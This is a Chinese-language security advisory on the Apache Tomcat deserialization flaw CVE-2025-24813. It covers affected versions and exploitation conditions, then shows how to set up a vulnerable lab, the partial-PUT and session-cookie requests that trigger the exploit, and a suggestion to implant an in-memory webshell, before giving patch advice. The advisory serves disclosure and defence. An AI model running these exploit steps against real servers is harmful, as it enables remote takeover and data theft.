近期,国家信息安全漏洞库(CNNVD)收到关于 Apache Tomcat 安全漏洞CVE-2025-24813情况的报送。此漏洞可使未授权的攻击者远程执行恶意代码,危害极大。为保障各单位网络安全,现发布该漏洞预警信息,请各单位高度重视,及时做好安全防护工作。
一、漏洞概述
Apache Tomcat 是美国阿帕奇(Apache)基金会一款广泛使用的轻量级 Web 应用服务器,主要用于实现对 Servlet 和 JavaServer Page(JSP)的支持。此次漏洞的产生源于 Apache Tomcat 反序列化机制未对用户输入进行严格验证,导致攻击者能够通过构造恶意序列化对象绕过安全限制,进而实现远程恶意代码的执行,最终获取服务器的控制权。
二、危害影响
受此漏洞影响的 Apache Tomcat 版本包括 11.0.0-M1 至 11.0.2 版本、10.1.0-M1 至 10.1.34 版本以及 9.0.0.M1 至 9.0.98 版本。一旦漏洞被成功利用,攻击者可执行任意代码,实现对服务器的完全控制。这将导致服务器上的数据面临被窃取、篡改或删除的风险,严重影响业务的正常运行,甚至可能导致企业敏感信息泄露,造成不可估量的损失。
三、漏洞利用条件
当应用程序同时满足以下条件时,攻击者可利用该漏洞:
-
启用 Servlet 写入功能:应用程序启用了 DefaultServlet 写入功能,而该功能在默认情况下是关闭的。
-
支持 partial PUT 请求:应用支持 partial PUT 请求,此功能默认开启,攻击者可通过该请求将恶意的序列化数据写入到会话文件中。
-
使用 Tomcat 的文件会话持久化:应用使用了 Tomcat 的文件会话持久化机制,并且使用了默认的会话存储位置。
-
包含存在反序列化漏洞的库:应用中包含一个存在反序列化漏洞的库,如类路径下的 commons - collections 等,此条件取决于业务实现是否依赖存在反序列化利用链的库。
此外,当上传文件目标 URL 为公共目标 URL 的子目录,且攻击者知悉上传文件名称时,未经身份验证的攻击者可获取目标文件信息或添加文件内容。
四、环境安装
1、环境安装:https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.97/bin/
2、配置更改:
(1)context.xml添加以下内容
<ManagerclassName="org.apache.catalina.session.PersistentManager">
<StoreclassName="org.apache.catalina.session.FileStore"/>
</Manager>
(2)web.xml将DefaultServlet的readonly配置为false
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
(3)将Commons Collections 3.2.1.jar放入webappsROOTWEB-INFlib文件夹
下载链接:https://mvnrepository.com/artifact/commons-collections/commons-collections/3.2.1
startup.bat
五、漏洞复现
1、使用Java-Chains工具生成payload
下载链接:https://github.com/vulhub/java-chains/blob/main/README.zh-cn.md
PUT /hywl/session
Host: 192.168.58.134:8080
Content-Length: 2086
Content-Range: bytes 0-2086/2200
{{base64dec(反序列化内容)}}
3、会在ROOT中生成session文件
4、稍等几秒会自动触发
或者直接执行以下命令手动触发(如未执行成功,请查看是否有权限)
GET / HTTP/1.1
Host: 192.168.58.134:8080
Cookie: JSESSIONID=.hywl
5、进一步扩大漏洞危害,植入内存马,选择Gadget注入内存马。
六、修复建议
目前,Apache 官方已发布新版本修复了该漏洞,建议各用户及时确认所使用的产品版本,并尽快采取修补措施,将 Apache Tomcat 升级至安全版本,具体如下:
-
Apache Tomcat 11.0.3 或更高版本;
-
Apache Tomcat 10.1.35 或更高版本;
-
Apache Tomcat 9.0.99 或更高版本。
如因特殊原因无法立即进行升级,可参考以下临时缓解措施:
1、禁用ѕеrvlеt写入功能(rеаdоnlу=true)
原文始发于微信公众号(网络威胁数据联盟):关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论